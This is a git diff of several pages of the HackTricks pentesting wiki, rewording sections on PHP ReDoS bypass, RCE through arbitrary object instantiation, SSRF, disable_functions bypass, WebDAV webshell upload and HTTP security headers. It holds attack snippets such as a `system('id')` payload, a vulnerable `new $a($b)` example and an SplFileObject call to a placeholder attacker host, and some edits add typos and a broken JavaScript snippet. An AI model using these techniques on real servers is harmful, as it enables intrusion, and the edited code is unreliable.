 ### Test multiple cookies using batch mode
 
-```
-$ cookie-monster -b -f cookies.json
+```bash
+cookie-monster -b -f cookies.json
 ```
 
 ### Test multiple cookies using batch mode with a custom wordlist
 
-```
-$ cookie-monster -b -f cookies.json -w custom.lst
+```bash
+cookie-monster -b -f cookies.json -w custom.lst
 ```
 
 ### Encode and sign a new cookie
 
-if you know the secret you can sign a the cookie.
+iI you know the secret you can sign a the cookie.
 
-```
-$ cookie-monster -e -f new_cookie.json -k secret
+```bash
+cookie-monster -e -f new_cookie.json -k secret
 ```
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 6b31f0cf2..366339800 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -132,6 +132,9 @@ From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challen
 
 #### ReDoS Bypass
 
+Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
+
+
 <figure><img src="../../../.gitbook/assets/image (10).png" alt=""><figcaption></figcaption></figure>
 
 In short the problem happens because the `preg_*` functions in PHP builds upon the [PCRE library](http://www.pcre.org/). In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the amount of recursions allowed, but in PHP this limit [defaults to 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) which is more than fits in the stack.
@@ -145,9 +148,6 @@ To reach that, `'X'*500_001` will result in 1 million backtracking steps (500k f
 ```python
 payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
 ```
-
-From: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
-
 ### Type Juggling for PHP obfuscation
 
 ```php
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
index 19d4b0993..1ea23d946 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
@@ -14,17 +14,17 @@ Other ways to support HackTricks:
 
 </details>
 
+This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+
 ## Introduction
 
-In the situation where you can create a new arbitrary object like `new $_GET["a"]($_GET["a"])`you might be able to obtain RCE, and [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) exposes different ways to get RCE.
+The creation of new arbitrary objects, such as `new $_GET["a"]($_GET["a"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE.
 
 ## RCE via Custom Classes or Autoloading
 
-In the construction `new $a($b)`, the **variable `$a` stands for the class name** that the object will be created for, and the variable **`$b` stands for the first argument** that will be passed to the object’s constructor.
+The syntax `new $a($b)` is used to instantiate an object where **`$a`** represents the class name and **`$b`** is the first argument passed to the constructor. These variables can be sourced from user inputs like GET/POST, where they may be strings or arrays, or from JSON, where they might present as other types.
 
-If `$a` and `$b` come from GET/POST, they can be **strings or string arrays**. If they come from **JSON** or elsewhere, they **might have other types**, such as object or boolean.
-
-Let’s consider the following example:
+Consider the code snippet below:
 
 ```php
 class App {
@@ -33,110 +33,81 @@ class App {
     }
 }
 
-# Additionally, in PHP < 8.0 a constructor might be defined using the name of the class
 class App2 {
     function App2 ($cmd) {
         system($cmd);
     }
 }
 
-# Vulnerable code
 $a = $_GET['a'];
 $b = $_GET['b'];
 
 new $a($b);
 ```
 
-In this code, you can set  `$a`  to  `App`  or  `App2`  and  `$b`  to  `uname -a`. After this, the command  `uname -a`  will be executed.
+In this instance, setting `$a` to `App` or `App2` and `$b` to a system command (e.g., `uname -a`) results in the execution of that command.
 
-When there are no such exploitable classes in your application, or you have the class needed in a separate file that isn’t included by the vulnerable code, you may take a look at autoloading functions.
-
-**Autoloading functions** are set by registering callbacks via `spl_autoload_register` or by defining `__autoload`. They are called when an instance of an unknown class is trying to be created.
+**Autoloading functions** can be exploited if no such classes are directly accessible. These functions automatically load classes from files when needed and are defined using `spl_autoload_register` or `__autoload`:
 
 ```php
-# An example of an autoloading function
 spl_autoload_register(function ($class_name) {
-        include './../classes/' . $class_name . '.php';
+    include './../classes/' . $class_name . '.php';
 });
 
-# An example of an autoloading function, works only in PHP < 8.0
 function __autoload($class_name) {
-        include $class_name . '.php';
+    include $class_name . '.php';
 };
 
-# Calling spl_autoload_register with no arguments enables the default autoloading function, which includes lowercase($classname) + .php/.inc from include_path
 spl_autoload_register();
 ```
 
-Depending on the PHP version, and the code in the autoloading functions, some ways to get a Remote Code Execution via autoloading might exist.
+The behavior of autoloading varies with PHP versions, offering different RCE possibilities.
 
 ## RCE via Built-In Classes
 
-When you don’t have custom classes and autoloading, you can rely on **built-in PHP classes only**.
+Lacking custom classes or autoloaders, **built-in PHP classes** may suffice for RCE. The number of these classes ranges between 100 to 200, based on PHP version and extensions. They can be listed using `get_declared_classes()`.
 
-There are from 100 to 200 built-in PHP classes. The number of them depends on the PHP version and the extensions installed. All of built-in classes can be listed via the `get_declared_classes` function, together with the custom classes:
+Constructors of interest can be identified through the reflection API, as shown in the following example and the link [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
+
+**RCE via specific methods includes:**
+
+### **SSRF + Phar Deserialization**
+
+The `SplFileObject` class enables SSRF through its constructor, allowing connections to any URL:
 
 ```php
-var_dump(get_declared_classes());
-```
-
-Classes with useful constructors can be found via [the reflection API](https://www.php.net/manual/en/book.reflection.php).
-
-Displaying constructors and their parameters using the reflation API: [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF)\
-
-
-![](https://swarm.ptsecurity.com/wp-content/uploads/2022/07/2.png)
-
-If you control **multiple constructor parameters and can call arbitrary methods** afterwards, there are many ways to get a Remote Code Execution. But if you can pass **only one parameter and don’t have any calls** to the created object, there is **almost nothing**.
-
-I know of only three ways to get something from `new $a($b)`.
-
-### **SSRF + Phar deserialization**
-
-The `SplFileObject` class implements a constructor that allows connection to any local or remote URL:
-
-```
 new SplFileObject('http://attacker.com/');
 ```
 
-This allows SSRF. Additionally, SSRFs in PHP < 8.0 could be turned into deserializations via techniques with the Phar protocol.
+SSRF can lead to deserialization attacks in versions of PHP before 8.0 using the Phar protocol.
 
 ### **Exploiting PDOs**
 
-The PDO class has another interesting constructor:
+The PDO class constructor allows connections to databases via DSN strings, potentially enabling file creation or other interactions:
 
 ```php
 new PDO("sqlite:/tmp/test.txt")
 ```
 
-The `PDO` constructor accepts DSN strings, allowing us to **connect to any local or remote database** using **installed database extensions**. For example, the SQLite extension can create empty files.
-
 ### **SoapClient/SimpleXMLElement XXE**
 
-In PHP ≤ 5.3.22 and ≤ 5.4.12, the constructor of SoapClient was **vulnerable to XXE**. The constructor of SimpleXMLElement was vulnerable to XXE as well, but it required libxml2 < 2.9.
+Versions of PHP up to 5.3.22 and 5.4.12 were susceptible to XXE attacks through the `SoapClient` and `SimpleXMLElement` constructors, contingent on the version of libxml2.
 
 ## RCE via Imagick Extension
 
-Checking the **dependencies** of the **project** you are trying to exploit you could find **new classes** that could be **abused to execute commands** creating a new object. In this case, **Imagick** was found to be useful for that purpose.
+In the analysis of a **project's dependencies**, it was discovered that **Imagick** could be leveraged for **command execution** by instantiating new objects. This presents an opportunity for exploiting vulnerabilities.
 
 ### VID parser
 
-The VID parser allows to write arbitrary content in an arbitrary path inside the filesystem, which would allow an attacker to write a PHPshell in an accessible folder from the web page and get RCE.
+The VID parser capability of writing content to any specified path in the filesystem was identified. This could lead to the placement of a PHP shell in a web-accessible directory, achieving Remote Code Execution (RCE).
 
-![](<../../../.gitbook/assets/image (157) (3).png>)
+#### VID Parser + File Upload
 
-#### VID Parser + FIle Upload
-
-When a file is uploaded to PHP it's temporary stored in `/tmp/phpXXXXXX` . The VID parser of Imagick with the **msl** protocol allows to **specify wildcards in the file paths** (so the temporary uploaded file can be easily accessed) and **copy it to any arbitrary location**.\
-This is another way to get arbitrary file writing inside the filesystem:
-
-![](<../../../.gitbook/assets/image (159).png>)
+It's noted that PHP temporarily stores uploaded files in `/tmp/phpXXXXXX`. The VID parser in Imagick, utilizing the **msl** protocol, can handle wildcards in file paths, facilitating the transfer of the temporary file to a chosen location. This method offers an additional approach to achieve arbitrary file writing within the filesystem.
 
 ### PHP Crash + Brute Force
 
-The [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) explained another way to get RCE by **uploading files with specific content** and making the **server crash before it deletes** that file and then **bruteforcing the name** of the temporary file until **Imagick executes arbitrary PHP code**.
-
-However, apparently the **crash trick** discovered only **worked in an old version of ImageMagick**.
+A method described in the [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) involves uploading files that trigger a server crash before deletion. By brute-forcing the name of the temporary file, it becomes possible for Imagick to execute arbitrary PHP code. However, this technique was found to be effective only in an outdated version of ImageMagick.
 
 ## References
 
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
index e8f3c73eb..998af5ed8 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
@@ -24,7 +24,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ### SSRF PHP functions
 
-Some function such as _**file\_get\_contents(), fopen(), file(), md5\_file()** _ accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data:
+Some function such as _**file\_get\_contents(), fopen(), file(), md5\_file()**accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data:
 
 ```php
 file_get_contents("http://127.0.0.1:8081");
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index 5bf4f44f0..912bf5f41 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -538,14 +538,14 @@ It's well known that some functions in PHP like `mail()`are going to **execute b
 
 #### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
 
-1. `mail`
-2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
-3. `imap_mail` : If your system has `php-imap` module installed then this function also can be used to bypass the php disable\_functions.
-4. `libvirt_connect` : If your system has `php-libvirt-php` module installed then this function also can be used to bypass disable\_functions.
-5. `gnupg_init` : If your system has `php-gnupg` module installed then this function also can be used to bypass disable\_functions.
-6. `new imagick()`: You can [**find here a writeup**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/) to learn how to abuse this class
+* **`mail`**
+* **`mb_send_mail`**: Effective when the `php-mbstring` module is installed.
+* **`imap_mail`**: Works if `php-imap` module is present.
+* **`libvirt_connect`**: Requires the `php-libvirt-php` module.
+* **`gnupg_init`**: Utilizable with the `php-gnupg` module installed.
+* **`new imagick()`**: This class can be abused to bypass restrictions. Detailed exploitation techniques can be found in a comprehensive [**writeup here**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/).
 
-You can find [**here**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) the fuzzing script that was used to find those functions.
+You can [**find here**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) the fuzzing script that was used to find those functions.
 
 Here is a library you can compile to abuse the `LD_PRELOAD` env variable:
 
@@ -636,7 +636,9 @@ The following script tries some of the methods commented here:\
 
 These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used. 
 
-[Callbacks / Callables ](https://www.php.net/manual/en/language.types.callable.php)   
+[Callbacks / Callables ](https://www.php.net/manual/en/language.types.callable.php)
+
+[Following lists from here](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
 
 ```php
 // Function => Position of callback arguments
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
index 41b381aaf..32c1628d5 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -244,7 +244,7 @@ function pwn($cmd) {
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
index edae83a52..85fb835b0 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -16,8 +16,9 @@ Other ways to support HackTricks:
 
 ## PHP-FPM
 
-PHP fastCGI Process Manager is an **alternative PHP FastCGI** implementation with some additional features (mostly) **useful for heavy-loaded sites**.\
-Internally, PHP-FPM is organized as a “master process” managing pools of individual “worker processes.” When the web server has a request for a PHP script, **the web server uses a proxy, FastCGI connection to forward the request to the PHP-FPM service**. The PHP-FPM service can **listen for these requests on the host server’s network ports or through Unix sockets**. Although requests pass via a proxy connection, the PHP-FPM service must run on the same server as the web server. Notably, the proxy connection for PHP-FPM is not the same as a traditional proxy connection. As PHP-FPM receives a proxied connection, a free PHP-FPM worker accepts the web server’s request. PHP-FPM then compiles and executes the PHP script, sending the output back to the web server. Once a PHP-FPM worker finishes handling a request, the system releases the worker and waits for new requests.
+**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service has the capability to **receive requests either via network ports on the server or Unix sockets**.
+
+Despite the intermediary role of the proxy connection, PHP-FPM needs to be operational on the same machine as the web server. The connection it uses, while proxy-based, differs from conventional proxy connections. Upon receiving a request, an available worker from PHP-FPM processes it—executing the PHP script and then forwarding the results back to the web server. After a worker concludes processing a request, it becomes available again for upcoming requests.
 
 ## But what is CGI and FastCGI?
 
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 4403671b1..e2e76b032 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -22,16 +22,15 @@ Other ways to support HackTricks:
 
 </details>
 
-A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
+When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.
 
-You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.\
-Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) _(Basic Auth)_.
+Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common method to acquire them.
 
-Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
+To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:
 
-* **Upload** files with **executable extensions** (maybe it's not forbidden).
-* **Upload** files **without executable extensions** (like .txt) and try to **rename** the file (move) with an **executable extension**.
-* **Upload** files **without executable extensions** (like .txt) and try to **copy** the file (move) with **executable extension.**
+- **Upload** files with **executable extensions** directly if not restricted.
+- **Rename** uploaded non-executable files (like .txt) to an executable extension.
+- **Copy** uploaded non-executable files, changing their extension to one that is executable.
 
 ## DavTest
 
@@ -122,6 +121,9 @@ To check if the new credentials are working you can do:
 wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
 ```
 
+## References
+* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/network-services-pentesting/pentesting-web/special-http-headers.md b/network-services-pentesting/pentesting-web/special-http-headers.md
index 1b40713e6..c54163f2a 100644
--- a/network-services-pentesting/pentesting-web/special-http-headers.md
+++ b/network-services-pentesting/pentesting-web/special-http-headers.md
@@ -118,14 +118,16 @@ For example a combination of **`Range`** and **`Etag`** in a HEAD request can le
 
 ## Controls
 
-* **`Allow`:** Lists the set of methods supported by a resource. `Allow: GET, POST, HEAD`
-* **`Expect`**: The **`Expect`** HTTP request header indicates expectations that need to be fulfilled by the server in order to properly handle the request.
-  * No other expectations except `Expect: 100-continue` are specified currently. Informs recipients that the client is about to send a (presumably large) message body in this request and wishes to receive a [`100`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/100) (Continue) interim response.
+* **`Allow`**: This header is used to communicate the HTTP methods a resource can handle. For example, it might be specified as `Allow: GET, POST, HEAD`, indicating that the resource supports these methods.
+* **`Expect`**: Utilized by the client to convey expectations that the server needs to meet for the request to be processed successfully. A common use case involves the `Expect: 100-continue` header, which signals that the client intends to send a large data payload. The client looks for a `100 (Continue)` response before proceeding with the transmission. This mechanism helps in optimizing network usage by awaiting server confirmation.
 
 ## Downloads
 
-* **`Content-Disposition`**: In a regular HTTP response, the **`Content-Disposition`** response header is a header indicating if the content is expected to be displayed _inline_ in the browser, that is, as a Web page or as part of a Web page, or as an _attachment_, that is downloaded and saved locally.
-  * `Content-Disposition: attachment; filename="filename.jpg"`
+* The **`Content-Disposition`** header in HTTP responses directs whether a file should be displayed **inline** (within the webpage) or treated as an **attachment** (downloaded). For instance:
+```
+Content-Disposition: attachment; filename="filename.jpg"
+```
+This means the file named "filename.jpg" is intended to be downloaded and saved.
 
 ## Security Headers
 
@@ -135,126 +137,76 @@ For example a combination of **`Range`** and **`Etag`** in a HEAD request can le
 [content-security-policy-csp-bypass](../../pentesting-web/content-security-policy-csp-bypass/)
 {% endcontent-ref %}
 
-### Trusted Types <a href="#tt" id="tt"></a>
+### **Trusted Types**
 
-Trusted Types provide the tools to write, security review, and maintain applications free of DOM XSS. They can be enabled via [CSP](https://web.dev/security-headers/#csp) and make JavaScript code secure by default by limiting dangerous web APIs to only accept a special object—a Trusted Type.
-
-To create these objects you can define security policies in which you can ensure that security rules (such as escaping or sanitization) are consistently applied before the data is written to the DOM. These policies are then the only places in code that could potentially introduce DOM XSS.
-
-```http
-Content-Security-Policy: require-trusted-types-for 'script'
-```
+By enforcing Trusted Types through CSP, applications can be protected against DOM XSS attacks. Trusted Types ensure that only specifically crafted objects, compliant with established security policies, can be used in dangerous web API calls, thereby securing JavaScript code by default.
 
 ```javascript
 // Feature detection
 if (window.trustedTypes && trustedTypes.createPolicy) {
   // Name and create a policy
   const policy = trustedTypes.createPolicy('escapePolicy', {
-    createHTML: str => {
-      return str.replace(/\</g, '&lt;').replace(/>/g, '&gt;');
-    }
+    createHTML: str => str.replace(/\</g, '&lt;').replace(/>/g, '&gt;');
   });
 }
 ```
 
 ```javascript
-// Assignment of raw strings is blocked by Trusted Types.
-el.innerHTML = 'some string'; // This throws an exception.
-
-// Assignment of Trusted Types is accepted safely.
+// Assignment of raw strings is blocked, ensuring safety.
+el.innerHTML = 'some string'; // Throws an exception.
 const escaped = policy.createHTML('<img src=x onerror=alert(1)>');
-el.innerHTML = escaped;  // '&lt;img src=x onerror=alert(1)&gt;'
+el.innerHTML = escaped;  // Results in safe assignment.
 ```
 
-### X-Content-Type-Options <a href="#xcto" id="xcto"></a>
+### **X-Content-Type-Options**
 
-When a malicious HTML document is served from your domain (for example, if an image uploaded to a photo service contains valid HTML markup), some browsers will treat it as an active document and allow it to execute scripts in the context of the application, leading to a [cross-site scripting bug](https://www.google.com/about/appsecurity/learning/xss/).
+This header prevents MIME type sniffing, a practice that could lead to XSS vulnerabilities. It ensures that browsers respect the MIME types specified by the server.
 
-`X-Content-Type-Options: nosniff` prevents it by instructing the browser that the [MIME type](https://mimesniff.spec.whatwg.org/#introduction) set in the `Content-Type` header for a given response is correct. This header is recommended for **all of your resources**.
-
-```http
+```
 X-Content-Type-Options: nosniff
 ```
 
-### X-Frame-Options <a href="#xfo" id="xfo"></a>
+### **X-Frame-Options**
 
-If a malicious website can embed your site as an iframe, this may allow attackers to invoke unintended actions by the user with [clickjacking](https://portswigger.net/web-security/clickjacking). Also, in some cases [Spectre-type attacks](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)) give malicious websites a chance to learn about the contents of an embedded document.
+To combat clickjacking, this header restricts how documents can be embedded in `<frame>`, `<iframe>`, `<embed>`, or `<object>` tags, recommending all documents to specify their embedding permissions explicitly.
 
-`X-Frame-Options` indicates whether or not a browser should be allowed to render a page in a `<frame>`, `<iframe>`, `<embed>`, or `<object>`. **All documents** are recommended to send this header to indicate whether they allow being embedded by other documents.
-
-If you need more granular control such as allowing only a specific origin to embed the document, use the [CSP](https://web.dev/security-headers/#csp) [`frame-ancestors`](https://developer.mozilla.org/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors) directive.
-
-```http
+```
 X-Frame-Options: DENY
 ```
 
-### Cross-Origin Resource Policy (CORP) <a href="#corp" id="corp"></a>
+### **Cross-Origin Resource Policy (CORP) and Cross-Origin Resource Sharing (CORS)**
 
-An attacker can embed resources from another origin, for example from your site, to learn information about them by exploiting web-based [cross-site leaks](https://xsleaks.dev).
-
-`Cross-Origin-Resource-Policy` mitigates this risk by indicating the set of websites it can be loaded by. The header takes one of three values: `same-origin`, `same-site`, and `cross-origin`. **All resources** are recommended to send this header to indicate whether they allow being loaded by other websites.
+CORP is crucial for specifying which resources can be loaded by websites, mitigating cross-site leaks. CORS, on the other hand, allows for a more flexible cross-origin resource sharing mechanism, relaxing the same-origin policy under certain conditions.
 
 ```
 Cross-Origin-Resource-Policy: same-origin
-```
-
-### Cross-Origin Resource Policy (CORB) <a href="#corp" id="corp"></a>
-
-It helps mitigate the threat of side-channel attacks (including Spectre). It is designed to prevent the browser from **delivering certain cross-origin network responses to a web page**, when they might contain sensitive information and are **not needed for existing web features**.\
-In the same way, it also helps mitigating Cross-Site Script Inclusion (XSSI) vulnerabilities.\
-For example, it will block a cross-origin text/html response requested from a \<script> or \<img> tag, replacing it with an empty response instead. This is an important part of the protections included with [Site Isolation](https://www.chromium.org/Home/chromium-security/site-isolation).
-
-### Cross-Origin Opener Policy (COOP) <a href="#coop" id="coop"></a>
-
-An attacker's website can open another site in a popup window to learn information about it by exploiting web-based [cross-site leaks](https://xsleaks.dev). In some cases, this may also allow the exploitation of side-channel attacks based on [Spectre](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)).
-
-The `Cross-Origin-Opener-Policy` header provides a way for a document to isolate itself from cross-origin windows opened through `window.open()` or a link with `target="_blank"` without `rel="noopener"`. As a result, any cross-origin opener of the document will have no reference to it and will not be able to interact with it.
-
-```http
-Cross-Origin-Opener-Policy: same-origin-allow-popups
-```
-
-### Cross-Origin Resource Sharing (CORS) <a href="#cors" id="cors"></a>
-
-Unlike other items in this article, Cross-Origin Resource Sharing (CORS) is not a header, but a browser mechanism that requests and permits access to cross-origin resources.
-
-By default, browsers enforce [the same-origin policy](https://web.dev/same-origin-policy/) to prevent a web page from accessing cross-origin resources. For example, when a cross-origin image is loaded, even though it's displayed on the web page visually, the JavaScript on the page doesn't have access to the image's data. The resource provider can relax restrictions and allow other websites to read the resource by opting-in with CORS.
-
-```http
 Access-Control-Allow-Origin: https://example.com
 Access-Control-Allow-Credentials: true
 ```
 
-{% content-ref url="../../pentesting-web/cors-bypass.md" %}
-[cors-bypass.md](../../pentesting-web/cors-bypass.md)
-{% endcontent-ref %}
+### **Cross-Origin Embedder Policy (COEP) and Cross-Origin Opener Policy (COOP)**
 
-### Cross-Origin Embedder Policy (COEP) <a href="#coep" id="coep"></a>
+COEP and COOP are essential for enabling cross-origin isolation, significantly reducing the risk of Spectre-like attacks. They control the loading of cross-origin resources and the interaction with cross-origin windows, respectively.
 
-To reduce the ability of [Spectre-based attacks](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)) to steal cross-origin resources, features such as `SharedArrayBuffer` or `performance.measureUserAgentSpecificMemory()` are disabled by default.
-
-`Cross-Origin-Embedder-Policy: require-corp` prevents documents and workers from loading cross-origin resources such as images, scripts, stylesheets, iframes and others unless these resources explicitly opt into being loaded via [CORS](https://web.dev/security-headers/#cors) or [CORP](https://web.dev/security-headers/#corp) headers. COEP can be combined with`Cross-Origin-Opener-Policy` to opt a document into [cross-origin isolation](https://web.dev/cross-origin-isolation-guide/).
-
-Use `Cross-Origin-Embedder-Policy: require-corp` when you want to enable [cross-origin isolation](https://web.dev/coop-coep/) for your document.
-
-```http
+```
 Cross-Origin-Embedder-Policy: require-corp
+Cross-Origin-Opener-Policy: same-origin-allow-popups
 ```
 
-### HTTP Strict Transport Security (HSTS) <a href="#hsts" id="hsts"></a>
+### **HTTP Strict Transport Security (HSTS)**
 
-Communication over a plain HTTP connection is not encrypted, making the transferred data accessible to network-level eavesdroppers.
+Lastly, HSTS is a security feature that forces browsers to communicate with servers only over secure HTTPS connections, thereby enhancing privacy and security.
 
-`Strict-Transport-Security` header informs the browser that it should never load the site using HTTP and use HTTPS instead. Once it's set, the browser will use HTTPS instead of HTTP to access the domain without a redirect for a duration defined in the header.
-
-```http
+```
 Strict-Transport-Security: max-age=3153600
 ```
 
-## Resources
+## References
 
+* [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
 * [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
 * [https://web.dev/security-headers/](https://web.dev/security-headers/)
